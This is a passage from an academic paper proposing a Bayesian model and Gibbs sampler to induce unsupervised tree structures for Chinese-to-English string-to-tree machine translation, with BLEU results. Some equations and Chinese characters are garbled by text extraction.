progress in improving translation quality (Liu et al., 2006, 2009; Quirk et al., 2005; Galley et al., 2004, 2006; Marcu et al., 2006; Shen et al., 2008; Zhang et al., 2011b). However, tree-based translation models always suffer from two major challenges: 1) They are usually built directly from parse trees, which are generated by supervised linguistic parsers. 1 A tree-based translation model is defined as a model using tree structures on one side or both sides. However, for many language pairs, it is difficult to acquire such corresponding linguistic parsers due to the lack of Tree-bank resources for training. 2) Parse trees are actually only used to model and explain the monolingual structure, rather than the bilingual mapping between language pairs. This indicates that parse trees are usually not the optimal choice for training tree-based translation models (Wang et al., 2010). Based on the above analysis, we can conclude that the tree structure that is independent from Tree-bank resources and simultaneously considers the bilingual mapping inside the bilingual sentence pairs would be a good choice for building tree- based translation models. Therefore, complying with the above conditions, we propose an unsupervised tree structure for tree- based translation models in this study. In the structures, tree nodes are labeled by combining the word classes of their boundary words rather than by syntactic labels, such as NP, VP. Furthermore, using these node labels, we design a generative Bayesian model to infer the final tree structure based on synchronous tree substitution grammars (STSG) 2 . STSG is derived from the word alignments and thus can grasp the bilingual mapping effectively. Training the Bayesian model is difficult due to the exponential space of possible tree structures for each training instance. We therefore develop an efficient Gibbs sampler with three novel Gibbs operators for training. The sampler is capable of exploring the infinite space of tree structures by performing local changes on the tree nodes. 2 We believe it is possible to design a model to infer the node label and tree structure jointly. We plan this as future work, and here, we focus only on inferring the tree structure in terms of the node labels derived from word classes. 243 The tree structure formed in this way is independent from the Tree-bank resources and simultaneously exploits the bilingual mapping effectively. Experiments show that the proposed unsupervised tree (U-tree) is more effective and reasonable for tree-based translation than the parse tree. The main contributions of this study are as follows: 1) Instead of the parse tree, we propose a Bayesian model to induce a U-tree for tree- based translation. The U-tree exploits the bilingual mapping effectively and does not rely on any Tree-bank resources. 2) We design a Gibbs sampler with three novel Gibbs operators to train the Bayesian model efficiently. The remainder of the paper is organized as follows. Section 2 introduces the related work. Section 3 describes the STSG generation process, and Section 4 depicts the adopted Bayesian model. Section 5 describes the Gibbs sampling algorithm and Gibbs operators. In Section 6, we analyze the achieved U-trees and evaluate their effectiveness. Finally, we conclude the paper in Section 7. 2 Related Work In this study, we move in a new direction to build a tree-based translation model with effective unsupervised U-tree structures. For unsupervised tree structure induction, DeNero and Uszkoreit (2011) adopted a parallel parsing model to induce unlabeled trees of source sentences for syntactic pre-reordering. Our previous work (Zhai et al., 2012) designed an EM- based method to construct unsupervised trees for tree-based translation models. This work differs from the above work in that we design a novel Bayesian model to induce unsupervised U-trees, and prior knowledge can be encoded into the model more freely and effectively. Blunsom et al. (2008, 2009, 2010) utilized Bayesian methods to learn synchronous context free grammars (SCFG) from a parallel corpus. The obtained SCFG is further used in a phrase-based and hierarchical phrase-based system (Chiang, 2007). Levenberg et al. (2012) employed a Bayesian method to learn discontinuous SCFG rules. This study differs from their work because we concentrate on constructing tree structures for tree-based translation models. Our U-trees are learned based on STSG, which is more appropriate for tree-based translation models than SCFG. Burkett and Klein (2008) and Burkett et al. (2010) focused on joint parsing and alignment. They utilized the bilingual Tree-bank to train a joint model for both parsing and word alignment. Cohn and Blunsom (2009) adopted a Bayesian method to infer an STSG by exploring the space of alignments based on parse trees. Liu et al. (2012) re-trained the linguistic parsers bilingually based on word alignment. Burkett and Klein (2012) utilized a transformation-based method to learn a sequence of monolingual tree transformations for translation. Compared to their work, we do not rely on any Tree-bank resources and focus on generating effective unsupervised tree structures for tree-based translation models. Zollmann and Venugopal (2006) substituted the non-terminal X in hierarchical phrase-based model by extended syntactic categories. Zollmann and Vogel (2011) further labeled the SCFG rules with POS tags and unsupervised word classes. Our work differs from theirs in that we present a Bayesian model to learn effective STSG translation rules and U-tree structures for tree-based translation models, rather than designing a labeling strategy for translation rules. 3 The STSG Generation Process In this work, we induce effective U-trees for the string-to-tree translation model, which is based on a synchronous tree substitution grammar (STSG) between source strings and target tree fragments. We take STSG as the generation grammar to match the translation model. Typically, such an STSG3 is a 5-tuple as follows: ( , , , , )s t t tG N S P ¦ ¦ where: i s¦ and t¦ represent the set of source and target words, respectively, i tN is the set of target non-terminals, i t tS N� is the start root non-terminal, and i P is the production rule set. 3 Generally, an STSG involves tree fragments on both sides. Here we only consider the special case where the source side is actually a string. 244 Apart from the start non-terminal tS , we define all the other non-terminals in tN by word classes. Inspired by (Zollmann and Vogel, 2011), we divide these non-terminals into three categories: one-word, two-word and multi-word non-terminals. The one-word non-terminal is a word class, such as C, meaning that it dominates a word whose word class is C. Two-word non-terminals are used to stand for two word strings. They are labeled in the form of C1+C2, where C1 and C2 are the word classes of the two words separately. Accordingly, multi-word non-terminals represent the strings containing more than two words. They are labeled as C1…Cn, demanding that the word classes of the leftmost word and the rightmost word are C1 and Cn, respectively. We use POS tag to play the role of word class4. For example, the head node of the rule in Figure 1 is a multi-word non-terminal PRP…RB. It requires that the POS tags of the leftmost and rightmost word must be PRP and RB, respectively. Xiong et al. (2006) showed that the boundary word is an effective indicator for phrase reordering. Thus, we believe that combining the word class of boundary words can denote the whole phrase well. PRP...RB we PRP VBP:x0 RB:x1 VBP+RB ᡁԜ x1 x0 wo-men Figure 1. An example of an STSG production rule. Each production rule in P consists of a source string and a target tree fragment. In the target tree fragment, each internal node is labeled with a non- terminal in tN , and each leaf node is labeled with either a target word in t¦ or a non-terminal in tN . The source string in a production rule comprises source words and variables. Each variable corresponds to a leaf non-terminal in the target tree fragment. In the STSG, the production rule is used to rewrite the root node into a string and a tree fragment. For example, in Figure 1, the rule rewrites the head node PRP…RB into the corresponding string and fragment. An STSG derivation refers to the process of generating a specific source string and target tree 4 The demand of a POS tagger impairs the independence from manual resources to some extent. In future, we plan to design a method to learn effective unsupervised labels for the non-terminals. structure by production rules. This process begins with the start non-terminal tS and an empty source string. We repeatedly choose production rules to rewrite the leaf non-terminals and expand the string until no leaf non-terminal is left. Finally, we acquire a source string and a target tree structure defined by the derivation. The probability of a derivation is given as follows: 1 ( ) ( | ) n i i i p d p r N � (1) where the derivation comprises a sequence of rules d=(r1,…,rn), and Ni represents the root node of rule ri. Hence, for a specific bilingual sentence pair, we can generate the best target-side tree structure based on the STSG, independent from the Tree- bank resources. The STSG used in the above process is learned by the Bayesian model that is detailed in the next section. Actually, SCFG can also be used to build the U- trees. We do not use SCFG because most of the tree-based models are based on STSG. In our Bayesian model, the U-trees are optimized through selecting a set of STSG rules. These STSG rules are consistent with the translation rules used in the tree-based models. Another reason is that STSG has a stronger expressive power on tree construction than SCFG. In a STSG-based U-tree or a STSG rule, although not linguistically informed, the nodes labeled by POS tags are also effective on distinguishing different ones. However, with SCFG, we have to discard all the internal nodes (i.e., flattening the U- trees or rules) to express the same sequence, leading to a poor ability of distinguishing different U-trees and production rules. Thus, using STSG, we can build more specific U-trees for translation. In addition, we find that the Bayesian SCFG grammar cannot even significantly outperform the heuristic SCFG grammar (Blunsom et al. 2009)5. This would indicate that the SCFG-based derivation tree as by-product is also not such good for tree-based translation models. Considering the above reasons, we believe that the STSG-based learning procedure would result in a better translation grammar for tree-based models. 5 In (Blunsom et al., 2009), for Chinese-to-English translation, the Bayesian SCFG grammar only outperform the heuristic SCFG grammar by 0.1 BLEU points on NIST MT 2004 and 0.6 BLEU points on NIST MT 2005 in the NEWS domain. 245 4 Bayesian Model In this section, we present a Bayesian model to learn STSG defined in section 3. In the model, we use șN to denote the probability distribution ( | )p r N in Equation (1). șN follows a multinomial distribution and we impose a Dirichlet prior (DP) on it: 0 0 | ~ ( ) | , ~ ( , ( | ) ) N N N N r N Multi P DP P N T T D D < (2) where 0 ( | )P N< (base distribution) is used to assign prior probabilities to the STSG production rules. ĮN controls the model’s tendency to either reuse existing rules or create new ones using the base distribution 0 ( | )P N< . Instead of denoting the multinomial distribution explicitly with a specific șN, we integrate over all possible values of șN to achieve the probabilities of rules. This integration results in the following conditional probability for rule ri given the previously observed rules r-i = r1 ,…, ri-1: 00 ( | ) ( | , , , ) i i r N ii i N i N N n P r N p r r N P n D D D � � � � � (3) Where n-i ri denotes the number of ri in ir� , and n -i N represents the total count of rules rewriting non- terminal N in ir� . Thanks to the exchangeability of the model, all permutations of the rules are actually equiprobable. This means that we can compute the probability of each rule based on the previous and subsequent rules (i.e. consider each rule as the last one). This characteristic allows us to design an efficient Gibbs sampling algorithm to train the Bayesian model. 4.1 Base Distribution The base distribution 0 ( | )P r N is designed to assign prior probabilities to the STSG production rules. Because each rule r consists of a target tree fragment frag and a source string str in the model, we follow Cohn and Blunsom (2009) and decompose the prior probability 0 ( | )P r N into two factors as follows: 0 ( | ) ( | ) ( | )P r N P frag N P str frag � (4) where ( | )P frag N is the probability of producing the target tree fragment frag. To generate frag, Cohn and Blunsom (2009) used a geometric prior to decide how many child nodes to assign each node. Differently, we require that each multi-word non-terminal node must have two child nodes. This is because the binary structure has been verified to be very effective for tree-based translation (Wang et al., 2007; Zhang et al., 2011a). The generation process starts at root node N. At first, root node N is expanded into two child nodes. Then, each newly generated node will be checked to expand into two new child nodes with probability pexpand. This process repeats until all the new non-terminal nodes are checked. Obviously, pexpand controls the scale of tree fragments, where a large pexpand corresponds to large fragments 6. The new terminal nodes (words) are drawn uniformly from the target-side vocabulary, and the non- terminal nodes are created by asking two questions as follows: 1) What type is the node, one-word, two- word or multi-word non-terminal? 2) What tag is used to label the node? The answer to question 1) is chosen from a uniform distribution, i.e., the probability is 1/3 for each type of non-terminal. The entire generation process is in a top-down manner, i.e., generating a parent node first and then its children. With respect to question 2), because the father node has determined the POS tags of boundary words, we only need one POS tag to generate the label of the current node. For example, in Figure 1, as the father node PRP…RB demands that the POS tag of the rightmost word is RB, the right child of PRP…RB must also satisfy this condition. Therefore, we choose a POS tag VBP and obtain the label VBP+RB. The POS tag is drawn uniformly from the POS tag set. If the current node is a one-word non-terminal, question 2) is unnecessary. Similarly, with respect to the two- word non-terminal node, questions 1) and 2) are both unnecessary for its two child nodes because they have already been defined by their father node. As an example of the generative process, the tree fragment in Figure 1 is created as follows: a. Determine that the left child of PRP…RB is a one-word non-terminal (labeled with PRP); b. Expand PRP and generate the word “we” for PRP; 6 In our experiment, we set pexpand to 1/3 to encourage small tree fragments. 246 c. Determine that the right child of PRP…RB is a two-word non-terminal; d. Utilize the predetermined RB and a POS tag VBP to form the tag of the two-word non- terminal: VBP+RB; e. Expand VBP+RB (to VBP and RB); f. Do not expand VBP and RB. ( | )P str frag in Equation (4) is the probability of generating the source string, which contains several source words and variables. Inspired by (Blunsom et al., 2009) and (Cohn and Blunsom, 2009), we define ( | )P str frag as follows: var 1 1 1 ( | ) ( ;1) | | poisson sw sw sw c c s i P str frag P c c i u u ¦ �� (5) where csw is the number of words in the source string. �s means the source vocabulary set. Further, cvar denotes the number of variables, which is determined by the tree fragment frag. As shown in Equation(5), we first determine how many source words to generate using a Poisson distribution Ppoisson(csw;1), which imposes a stable preference for short source strings. Then, we draw each source word from a uniform distribution over �s. Afterwards, we insert the variables into the string. The variables are inserted one at a time using a uniform distribution over the possible positions. This factor discourages more variables. For the example rule in Figure 1, the generative process of the source string is: a. Decide to generate one source word; b. Generate the source word “ᡁԜ (wo-men) ”; c. Insert the first variable after the word; d. Insert the second variable between the word and the first variable. Intuitively, a good translation grammar should carry both small translation rules with enough generality and large rules with enough context information. DeNero and Klein (2007) proposed this statement, and Cohn and Blunsom (2009) has verified it in their experiments with parse trees. Our base distribution is also designed based on this intuition. Considering the two factors in our base distribution, we penalize both large target tree fragments with many nodes and long source strings with many words and variables. The Bayesian model tends to select both small and frequent STSG production rules to construct the U-trees. With these types of trees, we can extract small rules with good generality and simultaneously obtain large rules with enough context information by composition. We will show the effectiveness of our U-trees in the verification experiment. 5 Model Training by Gibbs Sampling In this section, we introduce a collapsed Gibbs sampler, which enables us to train the Bayesian model efficiently. 5.1 Initialization State At first, we use random binary trees to initialize the sampler. To get the initial U-trees, we recursively and randomly segment a sentence into two parts and simultaneously create a tree node to dominate each part. The created tree nodes are labeled by the non-terminals described in section 3. Using the initial target U-trees, source sentences and word alignment, we extract minimal GHKM translation rules7 in terms of frontier nodes (Galley et al., 2004). Frontier nodes are the tree nodes that can map onto contiguous substrings on the source side via word alignment. For example, the bold italic nodes with shadows in Figure 2 are frontier nodes. In addition, it should be noted that the word alignment is fixed8, and we only explore the entire space of tree structures in our sampler. Differently, Cohn and Blunsom (2009) designed a sampler to infer an STSG by fixing the tree structure and exploring the space of alignment. We believe that it is possible to investigate the space of both tree structure and alignment simultaneously. This subject will be one of our future work topics. For each training instance (a pair of source sentence and target U-tree structure), the extracted GHKM minimal translation rules compose a unique STSG derivation9. Moreover, all the rules developed from the training data constitute an initial STSG for the Gibbs sampler. 7 We attach the unaligned word to the lowest frontier node that can cover it in terms of word alignment. 8 The sampler might reinforce the frequent alignment errors (AE), which would harm the translation model (TM). Actually, the frequent AEs also greatly impair the conventional TM. Besides, our sampler encourages the correct alignments and simultaneously discourages the infrequent AEs. Thus, compared with the conventional TMs, we believe that our final TM would not be worse due to AEs. Our final experiments verify this point and we will conduct a much detailed analysis in future. 9 We only use the minimal GHKM rules (Galley et al., 2004) here to reduce the complexity of the sampler. 247 jin-tian jian-mianwo-men zai-ci PRP+VBP today NN we PRP meet VBP again RB Ӻཙ ᡁԜ ⅑޽ 㿱䶒 PRP...RB NN...RB Figure 2. Illustration of an initial U-tree structure. The bold italic nodes with shadows are frontier nodes. Under this initial STSG, the sampler modifies the initial U-trees (initial sample) to create a series of new ones (new samples) by the Gibbs operators. Consequently, new STSGs are created based on the new U-trees simultaneously and used for the next sampling operation. Repeatedly and after a number of iterations, we can obtain the final U-trees for building translation models. 5.2 The Gibbs Operators In this section, we develop three novel Gibbs operators for the sampler. They explore the entire space of the U-tree structures by performing local changes on the tree nodes. For a U-tree of a given sentence, we define s- node as the non-root node covering at least two words. Thus, the set of s-node contains all the tree nodes except the root node, the pre-terminal nodes and leaf nodes, which we call non-s-node. For example, in Figure 2, PRB…RB and PRP+VBP are s-nodes, while NN and NN…RB are non-s-nodes. Since the POS tag sequence of the sentence is fixed, all non-s-nodes would stay unchanged in all possible U-trees of the sentence. Based on this fact, our Gibbs operators work only on s-nodes. Further, we assign 3 descendant candidates (DC) for each s-node: its left child, right child and its sibling. For example, in Figure 3, the 3 DCs for the s-node are node PRP, VBP and RB respectively. According to the different DCs it governs, every s- node might be in one of the two different states: 1) Left state: as Figure 3(a) shows, the s-node governs the left two DCs, PRP and VBP, and is labeled PRP+VBP. 2) Right state: as Figure 3(b) shows, the s-node governs the right two DCs, VBP and RB, and is labeled VBP+RB. For a specific U-tree, the states of s-nodes are fixed. Thus, by changing an s-node’s state, we can easily transform this U-tree to another one, i.e., from the current sample to a new one. To formulate the U-tree transformation process, we associate a binary variable Ȍ䌜{0,1} with each s-node, indicating whether the s-node is in the left �Ȍ �� or right state �Ȍ �� Then we can change the U-tree by changing value of the Ȍ parameters. Our first Gibbs operator, Rotate, just works by sampling value of the Ȍ�parameters, one at a time, and changing the U-tree accordingly. For example, in Figure 3(a), the s-node is currently in the left VWDWH��Ȍ ��:H�VDPSOH�WKH�Ȍ�RI�WKLV�QRGH��DQG�LI� WKH�VDPSOHG�YDOXH�RI�Ȍ�LV��ZH�NHHS�WKH�VWUXFWXUH� unchanged, i.e., in the left state. Otherwise, we change its state to the right state �Ȍ ��, and transform the U-tree to Figure 3(b) accordingly. jian-mianwo-men zai-ci s-node we PRP meet VBP again RB ᡁԜ ⅑޽ 㿱䶒 PRP...RB PRP+VBP jian-mianwo-men zai-ci s-node we PRP meet VBP again RB ᡁԜ ⅑޽ 㿱䶒 PRP...RB VBP+RB (b) Ȍ=1(a) Ȍ=0 Rotate Figure 3. Illustration of the Rotate operator. In the figure, (a) and (b) denote the s-node’s left state and right state respectively. The bold italic nodes with shadows in the figure are frontier nodes. Obviously, towards an s-node for sampling, the two values of Ȍ would define two different U-trees. Using the GHKM algorithm (Galley et al. 2004), we can get two different STSG derivations from the two U-trees based on the fixed word alignment. Each derivation carries a set of STSG rules (i.e., minimal GHKM translation rules) of its own. In the two derivations, the STSG rules defined by the two states include the one rooted at the s-node’s lowest ancestor frontier node, and the one rooted at the s-node if it is a frontier node. For instance, in Figure 3(a), as the s-node is not a frontier node, the left state (Ȍ �) defines only one rule: 0 2 1 0 1 2 : ... ( ( : : ) : ) leftr x x x PRP RB PRP VBP x PRP x VBP x RB o � Differently, in Figure 3(b), the s-node is a frontier node and thus the right state (Ȍ 1) defines two rules: 248 0 0 1 0 1 1 1 0 0 1 : ... ( : : ) : ( : : ) right right r x x PRP RB x PRP x VBP RB r x x VBP RB x VBP x RB � � o � o � Using these STSG rules, the two derivations are evaluated as follows (We use the value of Ȍ to denote the corresponding STSG derivation): 0 1 0 1 0 ( 0) ( | ) ( 1) ( , | ) ( | ) ( | , ) left right right right right right p p r r p p r r r p r r p r r r � � � � � � � � � < v < v Where r � refers to the conditional context, i.e., the set of all other rules in the training data. All the probabilities in the above formulas are computed by Equation(3). We then normalize the two scores and sample a value of Ȍ based on them. With the Bayesian model described in section 4, the sampler ZLOO�SUHIHU�WKH�Ȍ�WKDW�SURGXFHV�VPDOO�DQG�IUHTXHQW� STSG rules. This tendency results in more frontier nodes in the U-tree (i.e., the s-node tends to be in the state that is a frontier node), which will factor the training instance into more small STSG rules. In this way, the overall likelihood of the bilingual data is improved by the sampler. Theoretically, the Rotate operator is capable of arriving at any possible U-tree from the initial U- tree. This is because we can first convert the initial U-tree to a left branch tree by the Rotate operator, and then transform it to any other U-tree. However, it may take a long time to do so. Thus, to speed up the structure transformation process, we employ a Two-level-Rotate operator, which takes a pair of s- nodes in a parent-child relationship as a unit for sampling. Similar to the Rotate operator, we also assign a binary variable ȟ䌜{0,1} to each unit and update the U-tree by sampling the value of ȟ. The method of sampling ȟ is similar to the one used for Ȍ. Figure 4 shows an example of the operator. As shown in Figure 4(a), the unit NN…VBP and PRP+VBP is in the left state (ȟ=0), and governs the left three descendants: NN, PRP, and VBP. By the Two-level-Rotate operator, we can convert the unit to Figure 4(b), i.e., the ULJKW�VWDWH��ȟ=1). Just as Figure 4(b) shows, the governed descendants of the unit are turned to PRP, VBP, and RB. It may be confusing when choosing the parent- child s-node pair for sampling because the parent node always faces two choices: combining the left child or right child for sampling. To avoid confusion, we split the Two-level-Rotate operator into two operators: Two-level-left-Rotate operator, which works with the parent node and its left child, and Two-level-right-Rotate operator, which only considers the parent node and its right child 10 . Therefore, the operator used in Figure 4 is a Two- level-right-Rotate operator. jin-tian jian-mianwo-men zai-ci PRP+VBP Today NN we PRP meet VBP again RB Ӻཙ ᡁԜ ⅑޽ 㿱䶒 NN...VBP NN...RB jin-tian jian-mianwo-men zai-ci VBP+RB Today NN we PRP meet VBP again RB Ӻཙ ᡁԜ ⅑޽ 㿱䶒 PRP...RB NN...RB (a) ȟ=0 (b) ȟ=1 Two-level-right-Rotate Figure 4. Illustration of the Two-level-Rotate operator. The bold italic nodes with shadows in the Figure are frontier nodes. During sampling, for each training instance, the sampler first applies the Two-level-left-Rotate operator to all candidate pairs of s-nodes (parent s- node and its left child s-node) in the U-tree. After that, the Two-level-right-Rotate operator is applied to all the candidate pairs of s-nodes (parent s-node and its right child s-node). Then, we use the Rotate operator on every s-node in the U-tree. By utilizing the operators separately, we can guarantee that our sampler satisfies detailed balance. We visit all the training instances in a random order (one iteration). After a number of iterations, we can obtain the final U-tree structures and build the tree-based translation model accordingly. 6 Experiments 6.1 Experimental Setup The experiments are conducted on Chinese-to- English translation. The training data are the FBIS corpus with approximately 7.1 million Chinese words and 9.2 million English words. We obtain the bidirectional word alignment with GIZA++, and then adopt the grow-diag-final-and strategy to obtain the final symmetric alignment. We train a 5- gram language model on the Xinhua portion of the English Gigaword corpus and the English part of 10 We can also take more nodes as a unit for sampling, but this would make the algorithm much more complex. 249 the training data. For tuning and testing, we use the NIST MT 2003 evaluation data as the development set, and use the NIST MT04 and MT05 data as the test set. We use MERT (Och, 2004) to tune parameters. Since MERT is prone to search errors, we run MERT 5 times and select the best tuning parameters in the tuning set. The translation quality is evaluated by case-insensitive BLEU-4 with the shortest length penalty. The statistical significance test is performed by the re-sampling approach (Koehn, 2004). To create the baseline system, we use the open- source Joshua 4.0 system (Ganitkevitch et al., 2012) to build a hierarchical phrase-based (HPB) system, and a syntax-augmented MT (SAMT) 11 system (Zollmann and Venugopal, 2006) respectively. The translation system used for testing the effectiveness of our U-trees is our in-house string- to-tree system (abbreviated as s2t). The system is implemented based on (Galley et al., 2006) and (Marcu et al. 2006). In the system, we extract both the minimal GHKM rules (Galley et al., 2004), and the rules of SPMT Model 1 (Galley et al., 2006) with phrases up to length L=5 on the source side. We then obtain the composed rules by composing two or three adjacent minimal rules. To build the above s2t system, we first use the parse tree, which is generated by parsing the English side of the bilingual data with the Berkeley parser (Petrov et al., 2006). Then, we binarize the English parse trees using the head binarization approach (Wang et al., 2007) and use the resulting binary parse trees to build another s2t system. For the U-trees, we run the Gibbs sampler for 1000 iterations on the whole corpus. The sampler uses 1,087s per iteration, on average, using a single core, 2.3 GHz Intel Xeon machine. For the hyperparameters, we set Į to 0.1 and pexpand = 1/3 to give a preference to the rules with small fragments. We built an s2t translation system with the achieved U-trees after the 1000th iteration. We only use one sample to extract the translation grammar because multiple samples would result in a grammar that would be too large. 11 From (Zollmann and Vogel, 2011), we find that the performance of SAMT system is similar with the method of labeling SCFG rules with POS tags. Thus, to be convenient, we only conduct experiments with the SAMT system. 6.2 Analysis of The Gibbs Sampler To evaluate the effectiveness of the Gibbs sampler, we explore the change of the training data’s likelihood with increasing sampling iterations. 1.239E+08 1.243E+08 1.247E+08 1.251E+08 1.255E+08 1.259E+08 100 200 300 400 500 600 700 800 900 1000 Number of Sampling Iterations N eg at iv e- Lo g Li ke lih oo d random 1 random 2 random 3 Figure 5. Histograms of the training data’s likelihood vs. the number of sampling iterations. In the figure, random 1 to 3 refers to three independent runs of the sampler with different initial U-trees as initialization states. Figure 5 depicts the negative-log likelihood of the training data after several sampling iterations. The results show that the overall likelihood of the training data is improved by the sampler. Moreover, comparing the three independent runs, we see that although the sampler begins with different initial U-trees, the training data’s likelihood is always similar during sampling. This demonstrates that our sampler is not sensitive to the random initial U-trees and can always arrive at a good final state beginning from different initialization states. Thus, we only utilize the U-trees from random 1 for further analysis hereafter. 1.035E+07 1.040E+07 1.045E+07 1.050E+07 1.055E+07 1.060E+07 100 200 300 400 500 600 700 800 900 1000 Number of Sampling Iterations To ta l N um be r of F ro nt ie r N od es random 1 random 2 random 3 Figure 6. The total number of frontier nodes for the three independent runs. 6.3 Analysis of the U-tree Structure Acquiring better U-trees for translation is our final purpose. However, are the U-trees achieved by the 250 Gibbs sampler appropriate for the tree-based translation model? To answer this question, we first analyze the effect of the sampler on the U-trees. Figure 6 shows the total number of frontier nodes in the training data during sampling. The results show that the number of frontier nodes increases with increased sampling. This tendency indicates that our sampler prefers the tree structure with more frontier nodes. Consequently, the final U-tree structures can always be factored into many small minimal translation rules. Just as we have argued in section 4.1, this is beneficial for a good translation grammar. To demonstrate the above analysis, Figure 7 shows a visual comparison between our U-tree (from random 1) and the binary parse tree (found by head binarization). Because the traditional parse tree is not binarized, we do not consider it for this analysis. Figure 7 shows that whether it is the target tree fragment or the source string of the rule, our U-trees always tend to obtain the smaller ones12. This comparison verifies that our Bayesian tree induction model is effective in shifting the tree structures away from complex minimal rules, which tend to negatively affect translation. 0 200k 400k 600k 800k 1000k 2 3 4 5 6 7 8 9 10 >=11 U-Tree binary parse tree Number of Nodes in the Target Tree Fragment N um be r of R ul es Number of Words and Variables in the Source String 0 300k 600k 900k 1200k 1 2 3 4 5 6 7 N um be r of R ul es Figure 7. Histograms over minimal translation rule statistics comparing our U-trees and binary parse trees. 12 Binary parse trees get more tree fragments with two nodes than U-trees. This is because there are many unary edges in the binary parse trees, while no unary edge exists in our U-trees. Specifically, we show an example of a binary parse tree and our U-tree in Figure 8. The example U-tree is more conducive to extracting effective translation rules. For example, to translate the Chinese phrase “ӵ Ѫ”, we can extract a rule (R2 in Figure 9) directly from the U-tree because the phrase “ӵ Ѫ” is governed by a frontier node, i.e., node “VBD+RB”. However, because no node governs “ӵ Ѫ” in the binary parse tree, we can only obtain a rule (R1 in Figure 9) with many extra nodes and edges, such as node CD in R1. Due to these extra things, R1 is too large to show good generality. was QP dollarsUS1500only VBD NNSNNPCDRB NP NP ӵ 㖾ݳаॳӄⲮѪ NP-COMP (a) binary parse tree (b) U-tree was dollarsUS1500only VBD NNSNNPCDRB ӵ 㖾ݳаॳӄⲮѪ VBD+RB NNP+NNS CD...NNS VBD...NNS Figure 8. Example of different tree structures. The node NP-COMP is achieved by head binarization. The bold italic nodes with shadows denote frontier nodes. was QP only VBD CD:x0RB NP NP NP-COMP:x1 was only VBD RB ӵ ѪVBD+RB ӵ x1x0Ѫ R1: R2: Figure 9. Example rules to translate the Chinese phrase “ӵ Ѫ.” R1 is extracted from Figure 8(a), i.e., the binary parse tree. R2 is from Figure 8(b), i.e., the U-tree. 251 Based on the above analysis, we can conclude that our proposed U-tree structures are conducive to extracting small, minimal translation rules. This indicates that the U-trees are more consistent with the word alignment and are good at capturing bilingual mapping information. Therefore, because parse trees are always constrained by cross-lingual structure divergence, we believe that the proposed U-trees would result in a better translation grammar. We demonstrate this conclusion in the next sub-section. 6.4 Final Translation Results The final translation results are shown in Table 1. In the table, lines 3-6 refer to the string-to-tree systems built with different types of tree structures. Table 1 shows that all our s2t systems outperform the Joshua (HPB) and Joshua (SAMT) system significantly. This comparison verifies the superiority of our in-house s2t system. Moreover, the results shown in Table 1 also demonstrate the effectiveness of head binarization, which helps to improve the s2t system using parse trees in all translation tasks. To test the effectiveness of our U-trees, we give the s2t translation system using the U-trees (from random 1). The results show that the system using U-trees achieves the best translation result from all of the systems. It surpasses the s2t system using parse trees by 1.47 BLEU points on MT04 and 1.44 BLEU points on MT05. Moreover, even using the binary parse trees, the achieved s2t system is still lower than our U-tree-based s2t system by 0.97 BLEU points on the combined test set. From the translation results, we can validate our former analysis that the U-trees generated by our Bayesian tree induction model are more appropriate for string-to-tree translation than parse trees. System MT04 MT05 All Joshua (HPB) 31.73 28.82 30.64 Joshua (SAMT) 32.48 29.77 31.56 s2t (parse-tree) 33.73* 30.25* 32.75* s2t (binary-parse-tree) 34.09* 30.99*# 32.92* s2t (U-tree) 35.20*# 31.69*# 33.89*# Table 1. Results (in case-insensitive BLEU-4 scores) of s2t systems using different types of trees. The “*” and “#” denote that the results are significantly better than the Joshua (SAMT) system and the s2t system using parse trees (p<0.01). 6.5 Large Data We also conduct an experiment on a larger bilingual training data from the LDC corpus13. The training corpus contains 2.1M sentence pairs with approximately 27.7M Chinese words and 31.9M English words. Similarly, we train a 5-gram language model using the Xinhua portion of the English Gigaword corpus and the English part of the training corpus. With the same settings as before, we run the Gibbs sampler for 1000 iterations and utilize the final U-tree structure to build a string-to-tree translation system. The final BLEU score results are shown in Table 2. In the scenario with a large data, the string-to- tree system using our U-trees still significantly outperforms the system using parse trees. System MT04 MT05 All Joshua (HPB) 34.55 33.11 34.01 Joshua (SAMT) 34.76 33.72 34.37 s2t (parse-tree) 36.40* 34.53* 35.70* s2t (binary-parse-tree) 37.38*# 35.14*# 36.54*# s2t (U-tree) 38.02*# 36.12*# 37.34*# Table 2. Results (in case-insensitive BLEU-4 scores) for the large training data. The meaning of “*” and “#” are similar to Table 1. 7 Conclusion and Future Work In this paper, we explored a new direction to build a tree-based model based on unsupervised Bayesian trees rather than supervised parse trees. To achieve this purpose, we have made two major efforts in this paper: (1) We have proposed a novel generative Bayesian model to induce effective U-trees for tree-based translation. We utilized STSG in the model to grasp bilingual mapping information. We further imposed a reasonable hierarchical prior on the tree structures, encouraging small and frequent minimal rules for translation. (2) To train the Bayesian tree induction model efficiently, we developed a Gibbs sampler with three novel Gibbs operators. The operators are designed specifically to explore the infinite space of tree structures by performing local changes on the tree structure. 13 LDC category number : LDC2000T50, LDC2002E18, LDC2003E07, LDC2004T07, LDC2005T06, LDC2002L27, LDC2005T10 and LDC2005T34. 252 Experiments on the string-to-tree translation model demonstrated that our U-trees are better than the parse trees. The translation results verify that the well-designed unsupervised trees are actually more appropriate for tree-based translation than parse trees. Therefore, we believe that the unsupervised tree structure would be a promising research direction for tree-based translation. In future, we plan to testify our sampler with various initial trees, such as the tree structure formed by (Zhang et al., 2008). We also plan to perform a detailed empirical comparison between STST and SCFG under our settings. Moreover, we will further conduct experiments to compare our methods with other relevant works, such as (Cohn and Blunsom, 2009) and (Burkett and Klein, 2012). Acknowledgments We would like to thank Philipp Koehn and three anonymous reviewers for their valuable comments and suggestions. The research work has been funded by the Hi-Tech Research and Development Program (“863” Program) of China under Grant No. 2011AA01A207, 2012AA011101, and 2012AA011102. References Phil Blunsom, Trevor Cohn, Miles Osborne. 2008. Bayesian synchronous grammar induction. In Advances in Neural Information Processing Systems, volume 21, pages 161-168. Phil Blunsom, Trevor Cohn, Chris Dyer, and Miles Osborne. 2009. A gibbs sampler for phrasal synchronous grammar induction. In Proc. of ACL 2009, pages 782-790. Phil Blunsom and Trevor Cohn. 2010. Inducing synchronous grammars with slice sampling. In Proc. of NAACL 2010, pages 238-241. David Burkett and Dan Klein. 2008. Two languages are better than one (for syntactic Parsing). In Proc. of EMNLP 2008, pages 877-886. David Burkett, John Blitzer, and Dan Klein. 2010. Joint parsing and alignment with weakly synchronized grammars. In Proc. of NAACL 2010, pages 127-135. David Burkett and Dan Klein. 2012. Transforming trees to improve syntactic convergence. In Proc. of EMNLP 2012, pages 863-872. David Chiang. 2007. Hierarchical phrase-based translation. Computational Linguistics, 33 (2). pages 201-228. Dekai Wu. 1996. A polynomial-time algorithm for statistical machine translation. In Proc. of ACL 1996, pages 152-158. Dekai Wu. 1997. Stochastic inversion transduction grammars and bilingual parsing of parallel 